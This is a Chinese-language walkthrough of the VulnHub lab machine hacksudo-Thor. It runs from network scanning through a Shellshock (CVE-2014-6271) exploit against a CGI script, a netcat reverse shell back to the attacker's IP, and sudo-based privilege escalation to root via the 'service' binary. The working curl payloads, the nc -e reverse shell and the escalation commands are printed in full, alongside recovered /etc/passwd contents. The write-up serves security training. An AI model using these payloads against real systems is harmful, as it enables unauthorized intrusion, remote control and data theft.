vulnhub-->hacksudo-Thor靶机详细思路

目录

  • 1. IP探测
  • 2.端口服务扫描
  • 3.网站漏洞扫描
  • 4.目录扫描
  • 5.信息分析
  • 6.破壳漏洞(Shellshock)
    • nmap---漏洞检测
    • CVE-2014-6271
  • 7.nc反弹
  • 8.提权
  • 9.service提权

1. IP探测

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.140
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.130   08:00:27:4b:48:b0       PCS Systemtechnik GmbH
192.168.0.139   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.0.101   42:fd:92:b5:74:21       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 4 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.0.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:07 EST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.026s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: B8:3A:08:3B:F9:30 (Tenda Technology,Ltd.Dongguan branch)

Nmap scan report for 192.168.0.101 (192.168.0.101)
Host is up (0.019s latency).
All 1000 scanned ports on 192.168.0.101 (192.168.0.101) are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 42:FD:92:B5:74:21 (Unknown)

Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00033s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.0.139 (192.168.0.139)
Host is up (0.00038s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)

Nmap scan report for 192.168.0.140 (192.168.0.140)
Host is up (0.0000040s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 18.55 seconds

192.168.0.130

2.端口服务扫描

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.0.130 --min-rate 1000    
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:09 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O 192.168.0.130 --min-rate 1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:08 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00088s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

3.网站漏洞扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p21,22,80 192.168.0.130 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:12 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0011s latency).

PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /admin_login.php: Possible admin folder
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.0.130:80/
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/home.php
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/customer_login_action.php
|     Form id: 
|_    Form action: customer_login_action.php
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 32.61 seconds
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.0.130                                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.130
+ Target Hostname:    192.168.0.130
+ Target Port:        80
+ Start Time:         2024-02-11 08:14:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-02-11 08:15:05 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!

4.目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.130"          

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.0.130/_24-02-11_08-11-40.txt

Target: http://192.168.0.130/

[08:11:40] Starting: 
[08:11:42] 403 -  278B  - /.ht_wsr.txt                                      
[08:11:42] 403 -  278B  - /.htaccess.sample                                 
[08:11:42] 403 -  278B  - /.htaccess.bak1                                   
[08:11:42] 403 -  278B  - /.htaccess_extra
[08:11:42] 403 -  278B  - /.htaccess_orig
[08:11:42] 403 -  278B  - /.htaccess.orig
[08:11:42] 403 -  278B  - /.htaccessOLD2
[08:11:42] 403 -  278B  - /.htaccessOLD                                     
[08:11:42] 403 -  278B  - /.htaccessBAK
[08:11:42] 403 -  278B  - /.html                                            
[08:11:42] 403 -  278B  - /.htm                                             
[08:11:42] 403 -  278B  - /.htaccess_sc
[08:11:42] 403 -  278B  - /.htaccess.save
[08:11:42] 403 -  278B  - /.htpasswd_test
[08:11:42] 403 -  278B  - /.htpasswds                                       
[08:11:42] 403 -  278B  - /.httr-oauth                                      
[08:11:43] 403 -  278B  - /.php                                             
[08:11:51] 302 -    7KB - /admin_home.php  ->  home.php                     
[08:11:51] 200 -  489B  - /admin_login.php                                  
[08:11:59] 403 -  278B  - /cgi-bin/                                         
[08:12:01] 200 -    1KB - /contact.php                                      
[08:12:06] 301 -  314B  - /fonts  ->  http://192.168.0.130/fonts/           
[08:12:08] 200 -  278B  - /header.php                                       
[08:12:08] 200 -    2KB - /home.php                                         
[08:12:09] 301 -  315B  - /images  ->  http://192.168.0.130/images/         
[08:12:09] 200 -  666B  - /images/                                          
[08:12:16] 200 -    3KB - /news.php                                         
[08:12:23] 200 -    4KB - /README.md                                        
[08:12:25] 403 -  278B  - /server-status                                    
[08:12:25] 403 -  278B  - /server-status/                                   
                                                                             
Task Completed 
┌──(root㉿kali)-[~]
└─# dirb http://192.168.0.130          

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb 11 08:14:49 2024
URL_BASE: http://192.168.0.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.130/ ----
+ http://192.168.0.130/cgi-bin/ (CODE:403|SIZE:278)                                 
==> DIRECTORY: http://192.168.0.130/fonts/                                          
==> DIRECTORY: http://192.168.0.130/images/                                         
+ http://192.168.0.130/index.php (CODE:200|SIZE:5357)                               
+ http://192.168.0.130/server-status (CODE:403|SIZE:278)                            
                                                                                    
---- Entering directory: http://192.168.0.130/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                    
---- Entering directory: http://192.168.0.130/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Feb 11 08:14:59 2024
DOWNLOADED: 4612 - FOUND: 3

5.信息分析

通过上面一系列的探测,可以得到靶机:192.168.0.130,开放了21(被防火墙过滤),22(ssh服务),80(http服务)
访问80端口页面,看看有什么信息,一个登陆页面,并没有发现什么。

vulnhub-->hacksudo-Thor靶机详细思路_第1张图片

访问dirsearch,扫出来的目录/admin_login.php,是一个后台登陆的页面,尝试弱密码登陆,不行,还有一个/README.md目录,下载以后,
看到admin/password123账号密码,登陆成功

vulnhub-->hacksudo-Thor靶机详细思路_第2张图片vulnhub-->hacksudo-Thor靶机详细思路_第3张图片vulnhub-->hacksudo-Thor靶机详细思路_第4张图片

在Manage Customers中找到四个用户密码。

vulnhub-->hacksudo-Thor靶机详细思路_第5张图片

vulnhub-->hacksudo-Thor靶机详细思路_第6张图片

6.破壳漏洞(Shellshock)

破壳漏洞(Shellshock)是指一个影响Unix和Linux操作系统的严重安全漏洞,它影响了Bash命令解释器。该漏洞使攻击者能够在受影响的系统上执行任意代码,从而可能导致系统被入侵。
Shellshock漏洞的原因是Bash解释器在处理特定的环境变量时存在一个安全漏洞,攻击者可以通过构造恶意的环境变量来执行任意的Shell命令。这个漏洞的危害性很高,因为Bash是许多Unix系统和Linux系统中常用的Shell

得到了账号密码,也没有什么用,一筹莫展的时候,发现http://192.168.0.130/news.php这个目录,源代码中看到亮眼的/cgi-bin/

vulnhub-->hacksudo-Thor靶机详细思路_第7张图片

访问/cgi-bin目录,状态码403,代表没有权限,那我们扫一下这个目录

vulnhub-->hacksudo-Thor靶机详细思路_第8张图片

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.130/cgi-bin/"

  _|. _ _  _  _  _ _|_    v0.4.3                                                            
 (_||| _) (/_(_|| (_| )                                                                     
                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.0.130/_cgi-bin__24-02-11_08-47-25.txt

Target: http://192.168.0.130/

[08:47:25] Starting: cgi-bin/                                                               
[08:48:09] 500 -  611B  - /cgi-bin/shell.sh                                 
                                                                             
Task Completed 

nmap—漏洞检测

扫到shell.sh,看看是否有破壳漏洞
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130

--script http-shellshock: http-shellshock 是一个用于检测 Shellshock漏洞的脚本。Shellshock 是一个在 Bash shell 中发现的安全漏洞,允许远程攻击者执行任意代码

┌──(root㉿kali)-[~]
└─# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 09:07 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

CVE-2014-6271

直接去GitHub搜CVE-2014-6271,找exp

vulnhub-->hacksudo-Thor靶机详细思路_第9张图片

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://localhost:8080/cgi-bin/vulnerable

localhost:靶机IP地址
端口:80
vulnerable:漏洞入口-->shell.sh

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130:80/cgi-bin/shell.sh

命令执行成功

┌──(root㉿kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130/cgi-bin/shell.sh
curl: (3) URL using bad/illegal format or missing URL

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftpuser:x:1005:1004::/dev/null:/etc/
thor:x:1001:1001:,,,:/home/thor:/bin/bash
sddsd

7.nc反弹

┌──(root㉿kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.0.140 6666'" \  http://192.168.0.130/cgi-bin/shell.sh
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666                                
listening on [any] 6666 ...
connect to [192.168.0.140] from (UNKNOWN) [192.168.0.130] 56356
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$

8.提权

sudo -l 发现可执行文件/home/thor/./hammer.sh,执行,发现输入的命令,会以thor用户执行,所以执行bash,以Thor用户新开一个bash环境。

bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : id
id
Hey Dear ! I am id , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : bash
bash
Hey Dear ! I am bash , Please enter your Secret massage : bash
bash
id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)

9.service提权

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service

https://gtfobins.github.io/gtfobins/service/

vulnhub-->hacksudo-Thor靶机详细思路_第10张图片

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/sh
sudo service ../../bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
proof.txt  root.txt
# cat root.txt
cat root.txt
rooted
# cat proof.txt
cat proof.txt
rooted                                                                                                  
                                                        ████████                                  
                                                      ▒▒▒▒▒▒██▒▒▒▒                                
                                                    ▓▓░░▒▒▓▓  ░░▒▒██                              
                                                  ██░░▒▒▓▓▒▒▓▓  ░░▒▒██                            
                                                ██░░▒▒▓▓▒▒▒▒▒▒▓▓  ░░▒▒██                          
                                              ██░░▒▒▓▓▒▒▒▒░░░░▒▒▓▓  ░░▒▒▓▓      ██████            
                                            ▓▓░░▒▒▓▓▒▒▒▒░░░░░░░░▒▒▓▓  ░░▒▒▓▓  ▓▓░░▓▓▓▓▓▓          
                                            ▓▓▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░░▓▓  ░░▒▒▓▓░░░░░░▓▓██          
                                            ▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒▓▓░░▒▒▒▒██          
                                            ▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒▓▓▒▒▓▓░░          
                                              ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒▓▓              
                                                ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒██            
                                                  ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██          
                                                    ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓  ░░▒▒██        
                                                      ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓  ░░▒▒██      
                                                        ▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██    
                                                          ▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██  
                                                        ▓▓░░▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░░░░░▒▒▓▓  ▓▓▓▓██
                                                      ▓▓░░░░░░▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ▒▒▒▒▓▓  ████
                                                    ▓▓░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░  ▒▒▒▒▓▓▓▓▓▓░░██
                                                  ██░░░░░░▒▒▒▒██  ██▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓██░░▒▒██
                                                ██  ░░░░▒▒▒▒██      ██▓▓▓▓▓▓▒▒░░  ▒▒▓▓▓▓██░░▒▒██  
                      ░░        ░░            ██░░░░░░▒▒▒▒██          ██▓▓▓▓▓▓▒▒▒▒▓▓▓▓██░░▒▒██    
                              ░░  ░░  ░░    ██  ░░░░▒▒▒▒▓▓              ▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░▒▒██      
                  ░░              ░░      ██  ░░░░▒▒▒▒▓▓                ░░▓▓▓▓▓▓▓▓▓▓░░▒▒██        
                ░░                      ██  ░░░░▒▒▒▒▓▓                    ░░▓▓▓▓▓▓░░▒▒██          
                                      ██  ░░░░▒▒▒▒██                        ░░██▓▓██▓▓            
                                    ▓▓  ░░░░▒▒▒▒██                                                
                                  ██  ░░░░▒▒▒▒██                                                  
                                ▓▓  ░░░░▒▒▒▒██                                                    
                              ▓▓  ░░░░▒▒▒▒██                                                      
                          ░░▓▓░░░░░░▒▒▒▒██                                                        
                        ░░▓▓░░░░░░▒▒▒▒▓▓                                                          
                      ░░▒▒░░░░░░▒▒▒▒▓▓                                                            
                      ▒▒░░░░░░▒▒▒▒▓▓                                                              
                    ██░░░░░░▒▒▒▒▓▓                                                                
                  ██  ░░░░▒▒▒▒▓▓                                                                  
                ██  ░░░░▒▒▒▒▓▓                                                                    
              ██  ░░░░▒▒▒▒▓▓                                                                      
            ▓▓  ░░░░▒▒▒▒▓▓                                                                        
          ██  ░░░░▒▒▒▒▒▒                                                                          
        ▓▓░░░░░░▒▒▒▒██                                                                            
    ████▓▓▓▓░░▒▒▒▒██                                                                              
  ██▒▒  ▒▒▓▓▓▓▒▒██                                                                                
  ▓▓▒▒  ▒▒▒▒▓▓██                                                                                  
  ▓▓▒▒▒▒▒▒▓▓██                                                                                    
  ██▓▓▓▓▓▓▓▓██                                                                                    
  ░░▓▓▓▓▓▓▓▓░░                                                                                    

# 

你可能感兴趣的:(service提权,vulnhub,hacksudo-Thor,打靶)